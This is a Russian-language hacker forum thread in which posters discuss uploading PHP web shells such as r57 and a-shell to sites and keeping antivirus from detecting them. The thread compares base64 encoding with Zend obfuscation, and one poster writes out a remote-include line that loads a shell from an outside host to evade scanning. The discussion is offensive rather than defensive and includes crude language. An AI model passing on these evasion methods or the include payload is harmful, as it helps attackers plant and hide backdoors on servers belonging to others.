Вот собственно, решил залить шеленг, а оно неприлично выругалось. Говорит мол вебшелленг) Сначала р57, вот теперь и а-шелл
Банально но действенно, функций которые можно юзать больше 12, а их комбинации еще более многочисленны. Когда твоей задачей являеться не изобретательность а 100% уверенность в том что шелл не спалит антивирус люди пользуються этим способом.
[ cash ], ты мну разочаровал, я думал ты имеешь в виду Zend guard, или ещё чото круче, а ты о каком-то base64...
Шифровать опен сорс веб шелл зендом, все равно что дрочить когда рядом с тобой на кровати обалденная телка.
[ cash ] говорит, что зендить опен сорс веб шелл прероготива извращенцев... и я с ним полностью согласен... вопрос в другом если товарищам Ni0x`у и Ponchik`у нравятся сложности, то можно пользоваться такими вебшеллами, которые и шифровать ненадо
[ cash ], Scipio ну незнаю... Я как юзал include('http://site.ru/shell.txt'); так и буду юзать, никакой антивирь не запалит и никаких шифрований ненадо
А ты типа не нарывался на такие темы когда антивирус блочил доступ к шеллу ? И тут уже насрать что ты его инклюдишь.
странно... ранние версии drweb детектили aSpshell, последняя нет... про ачатшелл молчу.. у меня тока на рст реагирует в разширении .php